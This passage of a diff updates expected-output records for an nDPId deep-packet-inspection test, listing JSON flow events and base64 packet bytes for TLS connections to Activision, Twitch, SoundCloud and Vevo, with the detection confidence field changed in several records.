-02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.callofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issu
erDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.skylanders.com,*.sierragames.com,*.sekirothegame.com,*.ravensoftware.com,*.infinityward.com,*.highmoonstudios.com,*.highmoon.com,*.guitarhero.com,*.europeanwarzoneseries.com,*.demonware.net,*.crashbandicoot.com,*.callofdutyleague.com,*.callofdutyendowment.org,*.ca
llofdutyendowment.com,*.callofduty.com,*.activisionretail.com,*.activisionblizzardmedia.com,*.activisionblizzard.com,*.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Santa Monica, O=Activision Publishing, Inc., CN=activision.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"F7:39:B4:E7:27:83:D4:55:8B:13:77:16:D5:8A:3E:77:FB:2A:4F:41"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482659915,"flow_last_seen":1646482659915,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482659915,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1646482659915,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659915,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8NwhAAEAGcJnAqAGAkks+p7QEAbuPD+ThAAAAAKAC+vAn\/AAAAgQFtAQCCAp9leqxAAAAAAEDAwc="} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1646482659944,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482659944,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGrqGSSz6nwKgBgAG7tAQzgGmMjw\/k4qAS\/\/\/dhgAAAgQFTAQCCAr4JbCIfZXqsQEDAwk="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1646482659945,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482659945,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5NwpAAEAGbprAqAGAkks+p7QEAbuPD+TiM4BpjYAYAfarGwAAAQEICn2V6s\/4JbCIFgMBAgABAAH8AwPVHsjDDxZ0MEuPnh4mVZQrYKtXYBQ9pfekL0WuWf4AwyAvTRXY5\/1xoex7GTddskZx0XzTM0eEKSDE8zjmPz09AAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1ncWwudHdpdGNoLnR2ABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AICTuPjjZ\/cozh9y3b4u57OZ+NqRixmrA1oX4LnqMFUIxABcAQQTtWijAm0UTGHfpz\/ha9z62jseAV4wQoU798kRZvjxGrgocjEiYQtFtFEOacmIDo8c6dP4orndC+2JQqffkv\/gjACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
-00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
+00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":335,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482659915,"flow_last_seen":1646482659945,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482659945,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00927{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":336,"source":"sites.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482659915,"flow_last_seen":1646482659961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482659961,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"146.75.62.167","src_port":46084,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitch","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.3","client_requested_server_name":"gql.twitch.tv","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482686914,"flow_last_seen":1646482686914,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482686914,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"208.85.40.158","src_port":45936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":337,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1646482686914,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482686914,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8RWlAAEAGOjfAqAGA0FUonrNwAFCsdkxQAAAAAKAC+vAqmQAAAgQFtAQCCArNau1nAAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":338,"source":"sites.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1646482687080,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482687080,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8\/\/dAAPAGz6fQVSiewKgBgABQs3Db1RKprHZMUaASOQif4AAAAgQFtAEDAwAEAggKWgQEFM1q7Wc="} 
@@ -102,53 +102,53 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":339,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1646482724450,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724450,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8sa9AAEAG8DvAqAGAEkLEZspeAbv+oP0DAAAAAKAC+vBIlQAAAgQFtAQCCAqQpxNDAAAAAAEDAwc="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1646482724458,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482724458,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8e2QAAPYGsIYSQsRmwKgBgAG7yl4LcBoC\/qD9BKAS\/\/+NCwAAAgQFoAQCCAqOOgLQkKcTQwEDAwg="} 01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1646482724464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482724464,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5sbFAAEAG7jzAqAGAEkLEZspeAbv+oP0EC3AaA4AYAfbA9QAAAQEICpCnE1COOgLQFgMBAgABAAH8AwM6K+sImNx3dIej3yQBfsHlSQyH5l4F8hLKFYurrt+jPCCUv6qySiadEZg7Gj4\/vX5jrLg\/JYOIeoxWa\/ahTy7RDQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA5zb3VuZGNsb3VkLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACDq1odYnjLE9YoHd\/igeLWhv14ukLQSyf98ZPyHkQn7OgAXAEEEKYWpJR9uHJSJZBwzi1pAC8cLX9iNXc5VMFPlSgV8HHXqYbwegIwyfo36+y7oUVZIFeBilQuBs9gLF4NzHajtKwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00891{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":341,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482724450,"flow_last_seen":1646482724464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482724464,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00932{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":342,"source":"sites.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482724450,"flow_last_seen":1646482724472,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1646482724472,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.66.196.102","src_port":51806,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.SoundCloud","breed":"Fun","category":"Music"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"soundcloud.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482734324,"flow_last_seen":1646482734324,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482734324,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1646482734324,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734324,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8YZNAAEAGvz7AqAGAl2XAXNyUAbtdgP2MAAAAAKAC+vB5pwAAAgQFtAQCCArbJaT6AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1646482734331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482734331,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADkGJ9KXZcBcwKgBgAG73JRRJl9LXYD9jaAS\/\/87kQAAAgQFTAQCCArq9J312yWk+gEDAwk="} 
01168{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1646482734334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482734334,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5YZVAAEAGvT\/AqAGAl2XAXNyUAbtdgP2NUSZfTIAYAfZOkQAAAQEICtslpQXq9J31FgMBAgABAAH8AwNzr2vzd\/QT\/aDhJiSq61v58duBBGwTUq6z8fAzWLEV5CDNfOfaUUVYVfXW\/CDKtRAJ+tVWWsbZK9mMfW2g+Km+ogAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAh2ZXZvLmNvbQAXAAD\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"} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":345,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482734324,"flow_last_seen":1646482734334,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482734334,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 
-00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":346,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":1857,"flow_avg_l4_payload_len":464,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"vevo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"00447ab319e9d94ba2b4c1248e155917","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01479{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":348,"source":"sites.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482734324,"flow_last_seen":1646482734350,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1340,"flow_tot_l4_payload_len":4125,"flow_avg_l4_payload_len":687,"midstream":0,"thread_ts_msec":1646482734350,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"151.101.192.92","src_port":56468,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Vevo","breed":"Fun","category":"Music"},"tls": 
